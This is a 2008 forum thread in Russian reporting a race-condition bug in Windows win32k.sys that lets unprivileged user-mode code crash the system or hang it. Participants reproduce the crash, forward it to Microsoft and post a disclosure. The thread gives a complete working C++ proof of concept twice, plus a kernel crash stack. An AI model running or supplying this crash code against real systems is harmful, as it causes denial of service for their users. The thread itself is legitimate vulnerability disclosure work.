| 
 
 
 
 Легенда:
  новое сообщение 
  закрытая нитка 
  новое сообщение 
  в закрытой нитке 
  старое сообщение   | 
Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.
|  | Вроде ответили, что форварднули куда надо.  04.11.08 09:33  Число просмотров: 10753 Автор: amirul <Serge> Статус: The Elderman
 |  
| Посмотрим как быстро пофиксят |  | <programming> |  
| BSOD в win32k.sys  02.11.08 08:03 Автор: Killer{R} <Dmitry> Статус: Elderman
 |  
| Предисловие: привет amirul ;) Давече дописывал тут одну свою фриварную тулзу (HKM) и напоролся на бсод, вызываемый юзермодным кодом без админских прав. workaround от бсода я придумал, ибо негоже мелкой тулзе винду убивать, но сам бсод - есть баг микрософтовский. И вот относительно минимальный, исключительно юзермодный код, которым он воспроизводится:
 Готовый проект для VC6 (с откомпиленными бинарями) можно скачать тут: http://slil.ru/26296017
 Исходники, а то долго рассказывать что код делает:
 hookproc.dll:
 
 , 
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    return TRUE;
}
extern "C" __declspec(dllexport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam)
{
    ::Sleep(0);
    return ::CallNextHookEx(0, nCode, wParam, lParam);
}
---,
 launch.exe:
 
 , 
extern "C" __declspec(dllimport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam);
HANDLE g_stop_event = CreateEvent(NULL, TRUE, FALSE, NULL);
DWORD CALLBACK WinThreadProc(PVOID p)
{
    TCHAR name[32];
    if (p)
        wsprintf(name, "desk_%x", p);
    else
        wsprintf(name, "default");
    HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
    HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
    ::SetThreadDesktop(desk);
    for(int i=0; i<8; i++)
    {
        CreateWindow(TEXT("STATIC"), TEXT("dummy"), 
            WS_VISIBLE, 10, i*30, 200, 30, 0, 0, 0, 0);
    }
    MSG msg;
    while (1) 
    { 
        ::GetMessage(&msg, NULL, 0, 0);
        ::TranslateMessage(&msg); 
        ::DispatchMessage(&msg); 
    }
    ::SetThreadDesktop(old_desk);
    ::CloseDesktop(desk);
    return 0;
}
DWORD CALLBACK ThreadProc(PVOID p)
{
    TCHAR name[32];
    if (p)
        wsprintf(name, "desk_%x", p);
    else
        wsprintf(name, "default");
    
    HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
    ::SwitchDesktop(desk);
    ::Sleep(0);
    HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
    ::SetThreadDesktop(desk);
    HINSTANCE dll = ::GetModuleHandle(TEXT("HOOKPROC.dll"));
    HHOOK hk1 = ::SetWindowsHookEx(WH_MOUSE, DummyHookProc, dll, 0);
    HHOOK hk2 = ::SetWindowsHookEx(WH_CALLWNDPROC, DummyHookProc, dll, 0);
    HHOOK hk3 = ::SetWindowsHookEx(WH_CALLWNDPROCRET, DummyHookProc, dll, 0);
    HHOOK hk4 = ::SetWindowsHookEx(WH_GETMESSAGE, DummyHookProc, dll, 0);
    
    for (;;)
    {
        MSG msg;
        while (::PeekMessage(&msg, NULL, 0, 0, PM_REMOVE)) 
        { 
            ::TranslateMessage(&msg); 
            ::DispatchMessage(&msg); 
        }
        
        if (::MsgWaitForMultipleObjects(1, &g_stop_event, 
            FALSE, INFINITE, QS_ALLINPUT) == WAIT_OBJECT_0)
        {
            break;
        }
    }
    ::SwitchDesktop(old_desk);
    ::Sleep(0);
    ::UnhookWindowsHookEx(hk1);
    ::UnhookWindowsHookEx(hk2);
    ::UnhookWindowsHookEx(hk3);
    ::UnhookWindowsHookEx(hk4);
	::PostMessage(HWND_BROADCAST, WM_NULL, 0, 0);
	::SendNotifyMessage(HWND_BROADCAST, WM_NULL, 0, 0);
    ::SetThreadDesktop(old_desk);
    ::CloseDesktop(desk);
    return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    int i;
    for(i=0; i<4; i++)
    {
        ::CloseHandle(::CreateThread(NULL, 0, WinThreadProc, (LPVOID)i, 0, NULL));
    }
    ::Sleep(1000);;
    while((::GetAsyncKeyState(VK_ESCAPE)&32768)==0)
    {
        for(i=0; i<4; i++)
        {
            HANDLE trd = ::CreateThread(NULL, 0, ThreadProc, (LPVOID)i, 0, NULL);
            ::Sleep(500);
            ::SetEvent(g_stop_event);
            ::WaitForSingleObject(trd, INFINITE);
            ::ResetEvent(g_stop_event);
            ::CloseHandle(trd);
        }
    }
	return 0;
}
---,
 BSOD'ятся или жестко зависают в течении нескольких минут работы проги 2к3 на одноядерном атлоне, и Vista x86 на двухядерном интеле.
 Стек бсода с висты:
 
 
ChildEBP RetAddr  Args to Child              
8f5ac728 81e835a0 0000008e c0000005 97915cd3 nt!KeBugCheckEx+0x1e
8f5acaf8 81ea563a 8f5acb14 00000000 8f5acb68 nt!KiDispatchException+0x1a9
8f5acb60 81ea55ee 8f5acc5c 97915cd3 badb0d00 nt!CommonDispatchException+0x4a (FPO: [0,20,0])
8f5acb80 81f02215 0000000b 948f53f0 00000000 nt!KiExceptionExit+0x186
8f5acc5c 97991dad 15e02058 00000000 00000000 nt!EtwTraceContextSwap+0x14a
8f5acc78 979d9b8b 00000000 00000000 00000000 win32k!xxxCallNextHookEx+0x35 (FPO: [Non-Fpo])
8f5acccc 979166ed fbe024f0 00000005 00000000 win32k!fnHkINLPCWPEXSTRUCT+0x5d (FPO: [Non-Fpo])
8f5acce8 9793d674 fbe024f0 00000005 00000000 win32k!NtUserfnDWORD+0x27 (FPO: [Non-Fpo])
8f5acd20 81ea4a7a 005d00bc 00000005 00000000 win32k!NtUserMessageCall+0xc6 (FPO: [Non-Fpo])
8f5acd20 77549a94 005d00bc 00000005 00000000 nt!KiFastCallEntry+0x12a (FPO: [0,3] TrapFrame @ 8f5acd44)
06ecea5c 76b48871 76b70b70 005d00bc 00000005 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
06ecea60 76b70b70 005d00bc 00000005 00000000 USER32!NtUserMessageCall+0xc (FPO: [Non-Fpo])*WARNING: Unable to verify checksum for hookproc.dll*ERROR: Symbol file could not be found.  Defaulted to export symbols for hookproc.dll - 
06ecea90 1000102f 00000000 00000000 00000000 USER32!CallNextHookEx+0x10b (FPO: [Non-Fpo])
WARNING: Stack unwind information not available. Following frames may be wrong.
06ecead8 76b929ff 00040000 00000000 06eceaf0 hookproc!DummyHookProc+0x1f
06eceb00 76b50a65 084124f0 00000005 00000000 USER32!fnHkINLPCWPSTRUCTA+0x4f (FPO: [Non-Fpo])
06eceb28 775499ce 06eceb40 00000018 06ecf208 USER32!__fnDWORD+0x24 (FPO: [Non-Fpo])
06eceb54 76b43cf7 76b43b94 00000088 06ecee80 ntdll!KiUserCallbackDispatcher+0x2e (FPO: [0,0,0])
06eceb58 76b43b94 00000088 06ecee80 06eceba8 USER32!NtUserCreateWindowEx+0xc (FPO: [Non-Fpo])
06ecedfc 76b43cc3 00000088 06ecee80 06ecee94 USER32!VerNtUserCreateWindowEx+0x1ac (FPO: [Non-Fpo])
06eceea8 76b43d9a 00000088 6ff5239c 06ecee94 USER32!_CreateWindowEx+0x1f9 (FPO: [Non-Fpo])
 ---
 |  
|  | Вроде ответили, что форварднули куда надо.  04.11.08 09:33 Автор: amirul <Serge> Статус: The Elderman
 |  
| Посмотрим как быстро пофиксят |  
|  |  | А ктото говорил что не было ошибок в вин32к ;)  04.11.08 11:18 Автор: Killer{R} <Dmitry> Статус: Elderman
 |  
| А ктото говорил что не было ошибок в вин32к ;) Просто надо хорошо поискать. Судя по спертым сырцам винды код win32k - еще те макароны.. А в них баги всегда есть)
 |  
|  |  |  | Ну тогда мне выдали 2. Это третья  04.11.08 11:36 Автор: amirul <Serge> Статус: The Elderman
 |  
| > А ктото говорил что не было ошибок в вин32к ;) Причем своими глазами я видел только 2.
 
 > Просто надо хорошо поискать. Судя по спертым сырцам винды
 > код win32k - еще те макароны.. А в них баги всегда есть)
 Это да. Хотя наверное за всем этим есть какой то скрытый смысл - а если есть внутренняя логика, то неважно как оно выглядит внешне - ошибок будет мало. Хороший пример - автогенеренный код. Такой нечитабельной каши не напишет ни одна кодманки, а работает оно идеально :-)
 |  
|  |  |  |  | Проблема такого кода в том что его модифицировать опасно...  04.11.08 11:50 Автор: Killer{R} <Dmitry> Статус: Elderman
 Отредактировано 04.11.08 11:55  Количество правок: 2
 |  
| > Это да. Хотя наверное за всем этим есть какой то скрытый > смысл - а если есть внутренняя логика, то неважно как оно
 > выглядит внешне - ошибок будет мало. Хороший пример -
 > автогенеренный код. Такой нечитабельной каши не напишет ни
 > одна кодманки, а работает оно идеально :-)
 Проблема такого кода в том что его модифицировать опасно. Особенно без полного набора тестов на функционал и безопасность. Одинаково опасно модифицировать и кашу кодманки и кодогенератора :)
 Что похоже и имело место тут. Т.к. ХР не свалилась за ночь издевательства десктопами. А 2к3/Виста валятся в первые 10 секунд. Могу даже дальше пофантазировать и предположить что изменения в коде были вызваны введением UAC и необходимостью разграничения доступа к user32 объектам между различными IL. Впрочем непонятно почему 2к3 поломали по сравнению с ХР. Может, там уже в win32k сделали эти изменения - на будущее :)
 |  
|  |  |  |  |  | Согласен  04.11.08 21:34 Автор: amirul <Serge> Статус: The Elderman
 |  
| > Проблема такого кода в том что его модифицировать опасно. > Особенно без полного набора тестов на функционал и
 Тесты то есть. И кавередж тоже. Вот только рейсы не выявляются ни одним кодкавереджем.
 
 > безопасность. Одинаково опасно модифицировать и кашу
 > кодманки и кодогенератора :)
 Ага :-)
 
 В общем пошло обсуждение и вроде бы нашли related issue.
 |  
|  | И тебе привет :-)  02.11.08 10:04 Автор: amirul <Serge> Статус: The Elderman
 |  
| > Давече дописывал тут одну свою фриварную тулзу (HKM) и > напоролся на бсод, вызываемый юзермодным кодом без
 > админских прав. workaround от бсода я придумал, ибо негоже
 > мелкой тулзе винду убивать, но сам бсод - есть баг
 Негоже.
 
 > микрософтовский. И вот относительно минимальный,
 > исключительно юзермодный код, которым он воспроизводится:
 Сейчас поздно. Завтра попробую потестить, а с понедельника опять таки попробую найти куда бы это протолкнуть.
 |  
|  |  | На работе проверил на ХР и Висте х64. ХР вроде не падает а...  03.11.08 15:25 Автор: Killer{R} <Dmitry> Статус: Elderman
 Отредактировано 03.11.08 15:27  Количество правок: 1
 |  
| > > микрософтовский. И вот относительно минимальный, > > исключительно юзермодный код, которым он
 > воспроизводится:
 > Сейчас поздно. Завтра попробую потестить, а с понедельника
 > опять таки попробую найти куда бы это протолкнуть.
 На работе проверил на ХР и Висте х64. ХР вроде не падает, а виста 64битная - тоже грохнулась как и 32хбитная. Причем уменьшение Sleep(500) до Sleep(100) значительно ускоряет процесс :)
 Похоже гдето гонка в win32k в снятии хуков.
 Кстати обе висты проапдейтенные по самое не балуй.
 |  
|  |  |  | Есть репродюс на висте и одной из последних сборок вин7 :-)  03.11.08 21:58 Автор: amirul <Serge> Статус: The Elderman
 |  
| > На работе проверил на ХР и Висте х64. ХР вроде не падает, а > виста 64битная - тоже грохнулась как и 32хбитная. Причем
 > уменьшение Sleep(500) до Sleep(100) значительно ускоряет
 > процесс :)
 > Похоже гдето гонка в win32k в снятии хуков.
 > Кстати обе висты проапдейтенные по самое не балуй.
 
 Буду искать куда бы это запихать (сам я баг открыть не могу - ибо совершенно в другой команде).
 |  
|  |  |  |  | может, в рассылку багтрака? :)  03.11.08 22:11 Автор: Killer{R} <Dmitry> Статус: Elderman
 |  
|  |  
|  |  |  |  |  | Можно и туда. По моему вполне себе новость. Но решение за dl-ем :-)  03.11.08 22:28 Автор: amirul <Serge> Статус: The Elderman
 |  
|  |  
|  |  |  |  |  |  | легко, если это будет сформулировано словами :)  03.11.08 22:59 Автор: dl <Dmitry Leonov>
 |  
| Т.е. источник проблемы - активное создание хуков из потоков в сочетании с созданием рабочих столов для каждого потока? |  
|  |  |  |  |  |  |  | Примерно такими? :)  03.11.08 23:35 Автор: Killer{R} <Dmitry> Статус: Elderman
 Отредактировано 03.11.08 23:38  Количество правок: 2
 |  
| Многократное переключение между Win32 объектами рабочих столов, на которых есть окна, с одновременным созданием потоков, устанавливающих/снимающих Win32 хуки на этих столах и рассылающих оконные сообщений на них в половине случаев приводит к BSODу изза AV в коде win32k.sys, а в другой половине - к зависанию системы. Происходит это предположительно изза race condition между потоком, снимающим хук и одновременной доставкой сообщения в другой поток. В этих условиях проблема воспроизводится под win'2k3, Vista x86 и x64. Для проведения атаки достаточно прав обычного пользователя. 
 Код:
 
 
 
hookproc.dll:
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    return TRUE;
}
extern "C" __declspec(dllexport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam)
{
    ::Sleep(0);
    return ::CallNextHookEx(0, nCode, wParam, lParam);
}
launch.exe:
// launch.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
extern "C" __declspec(dllimport) LRESULT CALLBACK DummyHookProc(int nCode, WPARAM wParam,LPARAM lParam);
HANDLE g_stop_event = CreateEvent(NULL, TRUE, FALSE, NULL);
DWORD CALLBACK WinThreadProc(PVOID p)
{
    TCHAR name[32];
    if (p)
        wsprintf(name, "desk_%x", p);
    else
        wsprintf(name, "default");
    HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
    HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
    ::SetThreadDesktop(desk);
    for(int i=0; i<8; i++)
    {
        CreateWindow(TEXT("STATIC"), TEXT("dummy"), 
            WS_VISIBLE, 10, i*30, 200, 30, 0, 0, 0, 0);
    }
    MSG msg;
    while (1) 
    { 
        ::GetMessage(&msg, NULL, 0, 0);
        ::TranslateMessage(&msg); 
        ::DispatchMessage(&msg); 
    }
    ::SetThreadDesktop(old_desk);
    ::CloseDesktop(desk);
    return 0;
}
DWORD CALLBACK ThreadProc(PVOID p)
{
    TCHAR name[32];
    if (p)
        wsprintf(name, "desk_%x", p);
    else
        wsprintf(name, "default");
    
    HDESK desk = ::CreateDesktop(name, 0, 0, 0, GENERIC_ALL, 0);
    ::SwitchDesktop(desk);
    ::Sleep(0);
    HDESK old_desk = ::GetThreadDesktop(::GetCurrentThreadId());
    ::SetThreadDesktop(desk);
    HINSTANCE dll = ::GetModuleHandle(TEXT("HOOKPROC.dll"));
    HHOOK hk1 = ::SetWindowsHookEx(WH_MOUSE, DummyHookProc, dll, 0);
    HHOOK hk2 = ::SetWindowsHookEx(WH_CALLWNDPROC, DummyHookProc, dll, 0);
    HHOOK hk3 = ::SetWindowsHookEx(WH_CALLWNDPROCRET, DummyHookProc, dll, 0);
    HHOOK hk4 = ::SetWindowsHookEx(WH_GETMESSAGE, DummyHookProc, dll, 0);
    
    for (;;)
    {
        MSG msg;
        while (::PeekMessage(&msg, NULL, 0, 0, PM_REMOVE)) 
        { 
            ::TranslateMessage(&msg); 
            ::DispatchMessage(&msg); 
        }
        
        if (::MsgWaitForMultipleObjects(1, &g_stop_event, 
            FALSE, INFINITE, QS_ALLINPUT) == WAIT_OBJECT_0)
        {
            break;
        }
    }
    ::SwitchDesktop(old_desk);
    ::Sleep(0);
    ::UnhookWindowsHookEx(hk1);
    ::UnhookWindowsHookEx(hk2);
    ::UnhookWindowsHookEx(hk3);
    ::UnhookWindowsHookEx(hk4);
	::PostMessage(HWND_BROADCAST, WM_NULL, 0, 0);
	::SendNotifyMessage(HWND_BROADCAST, WM_NULL, 0, 0);
    ::SetThreadDesktop(old_desk);
    ::CloseDesktop(desk);
    return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    int i;
    for(i=0; i<4; i++)
    {
        ::CloseHandle(::CreateThread(NULL, 0, WinThreadProc, (LPVOID)i, 0, NULL));
    }
    ::Sleep(1000);;
    while((::GetAsyncKeyState(VK_ESCAPE)&32768)==0)
    {
        for(i=0; i<4; i++)
        {
            HANDLE trd = ::CreateThread(NULL, 0, ThreadProc, (LPVOID)i, 0, NULL);
            ::Sleep(100);
            ::SetEvent(g_stop_event);
            ::WaitForSingleObject(trd, INFINITE);
            ::ResetEvent(g_stop_event);
            ::CloseHandle(trd);
        }
    }
	return 0;
}
---
 Готовый проект под VC6 и скомпилированные бинарники скачать можно тут: http://slil.ru/26299966
 |  
|  |  |  |  |  |  |  |  | вполне, спасибо; запостил  04.11.08 01:16 Автор: dl <Dmitry Leonov>
 |  
|  |  
|  |  |  |  |  |  |  | Предположительно изза race condition с потоком который...  03.11.08 23:08 Автор: Killer{R} <Dmitry> Статус: Elderman
 |  
| Предположительно изза race condition с потоком который снимает хук и одновременной доставкой сообщения в другой поток. Похоже оно пытается вызвать только что убитый хук. Имеют ли прямое отношение десктопы к этому, или просто оно приводят к каким либо особенным условиям тайминга исполнения плохо синхронизированного кода - пока хз. В дампе ничего напрямую про десктопы не видно. Но без них воспроизвести пока не получилось. |  
 
 
 |  |